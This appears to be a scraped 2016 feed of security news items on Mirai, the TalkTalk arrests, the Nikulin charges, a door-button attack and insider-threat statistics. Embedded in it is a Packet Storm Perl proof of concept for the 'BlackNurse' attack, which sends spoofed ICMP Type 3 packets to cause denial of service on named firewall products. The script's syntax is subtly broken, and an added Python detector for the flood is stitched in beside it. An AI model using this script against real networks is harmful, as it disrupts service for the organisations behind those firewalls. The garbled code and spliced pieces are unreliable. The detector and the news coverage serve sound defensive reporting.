Ajith

Users can now check whether their network is exposed to Mirai, one of the most prolific botnets to have targeted Internet of Things (IoT) devices this year.

The botnet was initially detailed in early September, but it became more popular in early October, when its author released the source code online. The malware, designed to harness the power of insecure IoT devices to launch distributed denial of service (DDoS) attacks, had been previously used in massive incidents targeting Brian Krebs' blog and hosting provider OVH.

With the primary purpose of IoT botnets being DDoS attacks, it’s no wonder that Akamai said that Mirai wasn’t alone in the 665 gigabit per second (Gbps) attempt to take down Krebs. However, security researchers reported that Mirai was increasingly used in DDoS incidents following the source code leak.

One such Mirai attack targeted DNS provider Dyn and disrupted popular websites such as Twitter, Etsy, GitHub, Soundcloud, PagerDuty, Spotify, Shopify, Airbnb, Intercom and Heroku. With infected devices in 164 countries and the use of Internet protocols that aren’t usually associated with DDoS attacks, such as STOMP floods, Mirai continues to wreak havoc. 

Because Mirai’s success is fueled by the existence of IoT devices that aren’t properly secured, it could be easily countered by simply changing the default credentials on vulnerable devices and by closing the Telnet port the botnet uses for infection. That, however, is an operation that users and network admins need to perform, but they might not always be aware of such an issue impacting them.

To help users determine whether their network is exposed to Mirai or not, IoT Defense Inc., a startup company based in the Washington DC Metro area, launched a web scanner that does exactly that: it searches for open TCP ports and informs users whether they are safe or not.

The IoT Defense scanner was written using a combination of Python, Node JS and Jade frameworks and scans for nearly a dozen ports that botnets can exploit. Accessing and using the scanner is free and little instruction is needed, as it does everything at the click of a button.

The tool was designed to scan for ports such as File Transfer Protocol (FTP), Secure Shell (SSH), Telnet (both 23 and the alternative 2323), HTTP, HTTPS, Microsoft-SQL-Server, EtherNet/IP, Telnet (alternative), Microsoft Remote Desktop Protocol (RDP), Web Proxy, and Apache Tomcat SSL (HTTPS).

While not all of these ports are targeted by Mirai, a couple are, with the 2323 Telnet port being specifically attacked. The IoT botnet scans the Internet for exposed IoT devices such as routers, IP cameras, and DVRs, and, when it finds vulnerable devices, it attempts to log in to them using a list of default login credentials.

This, however, is a behavior employed by other botnets as well. What’s more, while disinfecting a device compromised by Mirai is very easy, because a simple reboot would suffice, keeping the malware away from that device is more complicated. Because of constant scans, vulnerable IoT products are re-infected within minutes.

Device vendors are those who need to take action, because users rarely do so, T. Roy, CEO of IoT Defense, told SecurityWeek via email. They should add in-field auto-updates to their devices, should use per-device unique passwords (something that router manufacturers have already started implementing), and should not open up unnecessary ports.

Because their incentives are not aligned with device vendors, it’s clear that users might not be the ones to fix this issue. Users might not care – provided that they are aware of an issue – that their routers, IP cameras, or DVRs are used to DDoS websites and DNS providers. As long as the bandwidth usage doesn’t affect them, they are not disadvantaged, and T. Roy believes that one solution would be for ISPs to impose bandwidth caps.

A set of rules to impose stricter security of IoT devices would also be of help, and steps in this direction are already being taken, with the Department of Homeland Security (DHS) publishing its Strategic Principles for Securing the Internet of Things. The document includes six non-binding principles designed to provide security across the design, manufacturing and deployment of connected devices.

IoT Defense’s CEO also notes that IoT vendors need to have a servicing model in place, to resolve vulnerabilities in their devices when they are discovered. Just as it happens with many other products, vendors would be given a window to resolve the found issues or face consequences. However, he isn’t very optimistic about vendors actually taking a stance.

“As of today, IoT device manufacturers have very little to show for security which always gets trumped by new features and time or market concerns. It is wishful thinking to expect device vendors to step up their game and make security and privacy key differentiators for their products,” T. Roy said.

Last year, Gartner said that the number of connected devices will grow above the 20 billion mark by 2020. Now, Juniper Research estimates that there will be 38.5 billion connected IoT devices by that year, and that 70% of these units are expected to be non-consumer devices. Should the level of insecurity within these devices remain the same, the consequences will be dire for consumers, enterprises, and vendors alike.

The good news, however, is that even today enterprises block inbound open external access over protocols such as Telnet and SSH, meaning that IoT devices within corporate environments aren’t exposed. However, as Zscaler points out, these devices remain vulnerable nonetheless, and steps should be taken to defuse the situation, including automating the security and firmware updates and enforcing default password change at initial setup.

The issue at hand remains the existence of not only hundreds of thousands of IoT devices infected with Mirai, but also of hundreds of thousands more vulnerable to the botnet. More importantly, while the main purpose of IoT malware is the launch of DDoS attacks, cybercriminals have focused mainly on infecting complex devices, but could switch to simpler products such as smart toys, home appliances, wearables, and more, which would result in a flood of IoT malware all around us.

T. Roy agrees with that as well: “The day is not too far when Ransomware is going to straddle the boundary between the PC and the smart devices in the consumer's home. Unlike PC based ransomware where your pictures and videos are at stake, with everything being controlled by your smart devices your life and property are at stake.”

“Regulation will likely be the fix for IoT security,” F5 Networks evangelist David Holmes notes in a SecurityWeek column, citing Mikko Hypponen, Chief Risk Officer of F-Secure. However, he also explains that Internet security cannot be regulated like other manufacturing processes. Increasing awareness among users could also help resolve this issue, with the IoT Defense scanner being a small step in this direction.

Ionut Arghire is an international correspondent for SecurityWeek.


SecurityWeek RSS Feed

USN-3136-1: LXC vulnerability | Ubuntu


Ubuntu Security Notices

Kiwicon Not every demo at security cons goes off without a hitch: Badass hackers Ryan and Jeremy electrocuted themselves when building what could have been the first device capable of wirelessly exploiting door-opening push buttons.

The pair demonstrated the trial and terror process of building the box at the Kiwicon hacking event in New Zealand last Friday.

Before its insides dissolved due to extreme heat, the device was capable of activating the push buttons that open doors to allow egress from secure buildings - but from the outside of that building.

Ryan and Jeremy's beefed-up electromagnet is the latest in a niche line of research which would allow attackers to enter buildings by using the devices to unlock the push-button door controls.

"I guess they really are touch-to-enter buttons," Jeremy told the 2,000 laughing hackers at the Michael Fowler centre, Wellington.

"Should you be worried about this? Ehh probably not."

Ryan (left) and Jeremy. Image: Darren Pauli, The Register.

The pair chalked their work up as a failed-but-fun experiment, but in reality it was something more akin to success. Others interested in the field could leverage their work, as Ryan and Jeremy did with others' work, to build a more stable device.

If that were to happen, scores of buildings would be at risk of break and entry.

Right now, penetration testers on red teaming assignments rely on extendable sticks to shove between automatic doors. Such rigs allow them to physically depress the buttons in a much more obvious attack.

Ryan explained one beefed-up prototype that used ignition coils bought from car parts chain Supercheap Auto: "Instead of driving that small coil, it drives this massive coil, which goes into an even bigger coil which generates a large voltage which then jumps the spark gap and, instead of igniting fuel, it hits the touch-to-exit button," he says.

"The air is literally conducting electricity, it's scary stuff."

'It was just a tickle'.

During the testing process his mobile phone stopped working.

The pair, who again requested photographic anonymity, then increased the amount of electrons running through their prototype.

The current hopped across the helping hands and through Jeremy; "it was just a tickle" he says, asking delegates to please not inform his wife.

Several pieces of equipment melted including a high current motor driver which blew up instantly in a puff of blue smoke. Another piece of kit became so heated its solder melted.

A prototype.

They reworked some existing research which failed to open the push-to-exit buttons, building an electromagnetic interference fuzzer which used a scripting language and a VLSI interface into testing equipment, plus a microphone used to detect whether the contraption worked.

Lab gear.

The lab gear helped the pair better understand the right frequencies required to interfere with the push-to-exit button. They found that lots of noise forces the exit buttons to reduce sensitivity, and that suddenly removing that noise causes buttons to unlock.

"Some of these devices implement frequency-shifting so they are trying to evade interference like that," Ryan says.

The final prototype: A microcontroller taped to a battery, taped to a resonance circuit, taped to more batteries. RIP.

A final balled-up and taped device proved able to unlock the devices through a glass door, meaning attackers could use it to enter locked buildings, but it soon melted.

"Fortunately for us the frequency interference doesn't have to come from directly in front of the reader, and can come from the sides," Ryan says. "The range wasn't great though, and then we realised we were only using a fourth of the power, so we increased it."

"The hole in the middle?" he says, pointing to a burnt-out integrated circuit; "not meant to be there."

"We're good at prototypes." ®


The Register - Security

Three men are due to appear at the Old Bailey charged with various offences linked to an investigation into the mega TalkTalk hack a year ago.

The investigation was launched in October 2015 by the Met's Falcon Cyber Crime Unit following the hack in which 157,000 of its customers' personal details were accessed.

On Tuesday, 15 November, a 17-year-old boy pleaded guilty at Norwich Youth Court to seven offences under the Computer Misuse Act of 1990.

The boy was arrested in Norwich on 3 November last year and subsequently charged. He is due to be sentenced at Norwich Youth Court on 13 December.

The offences were all linked to the unauthorised access in October 2015 to data and programs on various organisations' websites including TalkTalk and Merit Badges as well as universities in Cambridge, Manchester, Sheffield, and Bournemouth.

As part of the wider investigation, detectives have also arrested three other individuals.

Daniel Kelley, of Llanelli, Wales, was charged on 26 September with various blackmail, cyber-crime and fraud offences, and is due to appear at the Old Bailey on Friday, 18 November.

Matthew Hanley and Conner Douglas Allsopp, both from Tamworth, were charged on 26 September with cyber crime and fraud offences and are due to appear at the Old Bailey on Monday, 21 November.

The investigation into the alleged data theft from the TalkTalk website is a joint investigation led by the Met's Cyber Crime Unit with support from Police Service Northern Ireland, Southern Wales Regional Organised Crime Unit, the National Crime Agency, and CERT UK (now the National Cyber Security Centre). ®


The Register - Security

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

Threatpost News Wrap, November 18, 2016

November 18, 2016 , 9:15 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

Network World | Nov 18, 2016

IBM Security has launched a network-emulation environment where corporate teams can play out attack scenarios so they are better prepared for incidents they might face in the real world.


InfoWorld Security

USN-3130-1: OpenJDK 7 vulnerabilities | Ubuntu


Ubuntu Security Notices

 #!/usr/bin/perl
#
# Cisco ASA 5515/5525/5550/5515-X | Fotinet |
# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N |
# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# [email protected]
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial
# of service to well known firewalls. Most ICMP attacks that we see are based
# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based
# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP
# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly
# effective even at low bandwidth. Low bandwidth is in this case around 15-18
# Mbit/s. This is to achieve the volume of packets needed which is around 40 to
# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
# connection. The impact we see on different firewalls is typically high CPU
# loads. When an attack is ongoing, users from the LAN side will no longer be
# able to send/receive traffic to/from the Internet. All firewalls we have seen
# recover when the attack stops.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Thanks to Maya (Maiya|Mia) Hristova and all my friends
# that support me.
#
#

use Net::RawIP;

print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
print "[ ======\n";
print "[ Usg: $ 0 <spoofed address> <target>\n";
print "[ Example: perl $ 0 133.71.33.7 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $ spoof = $ ARGV[0];
my $ target = $ ARGV[1];

my $ sock = new Net::RawIP( icmp => { }) or die;

print "[ Sending crafted packets..\n";
while ()
$ sock->set({ ip => { saddr => $ spoof, daddr => $ target,
icmp => type => 3, code => 3 });
$ sock->send;
$ sock->set( icmp => { type=>3, code => 0});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 1});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 2});
$ sock->send;
}
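
The PoC header above gives a defender two observable properties: the traffic is ICMP Type 3 (Destination Unreachable) arriving at a firewall's outside address, and the rate is in the tens of thousands of packets per second. The following Python detector is an added example, not part of the original PoC or advisory; the record format, function names, threshold and documentation-range addresses are assumptions made for illustration.

```python
from collections import Counter, defaultdict, deque
from dataclasses import dataclass, field

ICMP_DEST_UNREACHABLE = 3  # BlackNurse is built on ICMP Type 3 (Code 3 in particular)


@dataclass
class Type3Stats:
    dst: str
    peak_pps: float = 0.0
    codes: Counter = field(default_factory=Counter)
    sources: set = field(default_factory=set)


def parse_record(line):
    """Parse one 'epoch,src,dst,icmp_type,icmp_code' line (constructed format)."""
    ts, src, dst, icmp_type, icmp_code = line.strip().split(",")
    return float(ts), src, dst, int(icmp_type), int(icmp_code)


def detect_type3_flood(lines, threshold_pps, window=1.0):
    """Return {dst: Type3Stats} for destinations whose ICMP Type 3 rate reached
    threshold_pps in any sliding window. Lines must be in timestamp order."""
    recent = defaultdict(deque)   # dst -> timestamps still inside the window
    stats = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, icmp_type, icmp_code = parse_record(line)
        if icmp_type != ICMP_DEST_UNREACHABLE:
            continue              # echo requests etc. are a different problem
        entry = stats.setdefault(dst, Type3Stats(dst))
        entry.codes[icmp_code] += 1
        entry.sources.add(src)    # source may be spoofed, so key on dst, not src
        q = recent[dst]
        q.append(ts)
        while ts - q[0] >= window:
            q.popleft()
        entry.peak_pps = max(entry.peak_pps, len(q) / window)
    return {d: s for d, s in stats.items() if s.peak_pps >= threshold_pps}


def constructed_sample():
    """Constructed records: light background traffic, then one second at 40,000 pps."""
    lines = ["# epoch,src,dst,icmp_type,icmp_code"]
    for sec in range(1, 6):
        # ordinary port-unreachable replies, one per second, to another host
        lines.append(f"{sec:.6f},192.0.2.10,198.51.100.2,3,3")
        # an echo request to the firewall address; not Type 3, so ignored
        lines.append(f"{sec + 0.5:.6f},192.0.2.11,198.51.100.1,8,0")
    for i in range(40_000):       # Type 3 burst toward the firewall's outside address
        code = (3, 0, 1, 2)[i % 4]
        lines.append(f"{100 + i / 40_000:.6f},203.0.113.7,198.51.100.1,3,{code}")
    return lines


if __name__ == "__main__":
    # The threshold is an assumption: set it well above your normal Type 3 baseline.
    hits = detect_type3_flood(constructed_sample(), threshold_pps=20_000)
    for dst, s in hits.items():
        print(f"{dst}: peak {s.peak_pps:.0f} Type 3 pps, codes {dict(s.codes)}, "
              f"{len(s.sources)} source(s)")
```

Keying the window on the destination rather than the source matters here because the source address is attacker-chosen.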


Exploit Files ≈ Packet Storm

The Russian national arrested earlier this month by Czech police has been charged in the United States for hacking into the systems of LinkedIn, Dropbox and Formspring.

Yevgeniy Aleksandrovich Nikulin, 29, of Moscow, Russia, was arrested by Czech authorities on October 5, but news of the arrest only came to light last week.

While initially some believed that the arrest was related to cyberattacks supposedly launched by the Russian government against political organizations in the United States, LinkedIn revealed that the law enforcement operation, carried out in cooperation with the FBI, was actually linked to the breach suffered by the social media company in 2012.

The U.S. Department of Justice announced on Friday that Nikulin had been charged by a federal grand jury in Oakland, California, with nine counts related to obtaining information from computers, causing damage to computers, trafficking in access devices, aggravated identity theft and conspiracy.

Authorities said Nikulin is believed to be behind not only the LinkedIn breach, but also the 2012 attacks on Dropbox and Formspring.

The Dropbox hack, carried out after an employee’s credentials were stolen, has affected more than 68 million accounts, but the full extent of the incident only came to light recently. As for the social Q&A site Formspring, hackers leaked 420,000 hashed passwords back in 2012, which triggered a password reset on all user accounts.

According to the DoJ, LinkedIn and Formspring were also breached after hackers obtained employee credentials. Authorities said Nikulin conspired with others to sell the information stolen from Formspring.

Nikulin is currently in custody in the Czech Republic and the United States hopes to convince Czech authorities to approve his extradition. On the other hand, Moscow insists that the man be handed over to Russia.

Related: Moscow Confirms Ministry Website Attack After U.S. Hacker Claim

Related: 50 Hackers Using Lurk Banking Trojan Arrested in Russia

Related: US Jury Convicts Russian MP's Son for Hacking Scheme


SecurityWeek RSS Feed

A new Bitglass report on insider threats in the enterprise found that, in a third of organizations surveyed, careless or malicious user behavior resulted in data leakage, up slightly from a year ago. 56 percent of respondents believe insider leaks have become more frequent in the last year.

“Adoption of cloud and BYOD are positive developments, but organizations that have limited cross-app visibility will struggle to detect anomalous behavior and need to rethink their approach to data security,” said Nat Kausik, CEO, Bitglass. “The reality is that cloud apps have made data more readily accessible and insider threats more likely – it’s up to the enterprise to put adequate data controls and policies in place to secure vital data.”

Bitglass found that 64 percent of enterprises can detect a breach within a week, up significantly from 42 percent a year ago. Only 23 percent take a month or longer to identify insider breaches, which indicates growing use of cloud-based audit and security tools. Respondents identified analytics as critical in detecting anomalous behavior.

Employee training (57 percent) and identity management solutions (52 percent) topped the list of best means for preventing insider attacks. Data leakage prevention was also included among the most effective tools in 49 percent of organizations.

Key findings

  • One in three organizations surveyed have experienced an insider attack in the last year, while 74 percent feel vulnerable to insider threats.
  • Seventy-one percent of cybersecurity professionals are most concerned with inadvertent leaks that are the result of risky unsanctioned app usage, unintended external sharing and unsecured mobile devices. Negligence (68 percent) and malicious insiders (61 percent) were also of concern to respondents.
  • Privileged users, more than any other user group, were seen as posing the greatest security risk by 60 percent of organizations.
  • Cloud and mobile are forcing IT to rethink detection and prevention. Cybersecurity professionals agree that lack of employee training (62 percent), insufficient data protection solutions (57 percent), more devices with access to sensitive data (54 percent) and more data leaving the network perimeter (48 percent) are at the core of many insider leaks.
  • A third of organizations do not have any analytics solutions in place to detect insider threats. Fifty-six percent use some kind of analytics solution to address anomalous behavior, but only 15 percent have user behavior analytics in place.
  • Collaboration tools (44 percent) and cloud storage apps (39 percent) were perceived to be most vulnerable to insider threats, as careless users are easily able to share data externally or lose a mobile device that contains sensitive information.


Help Net Security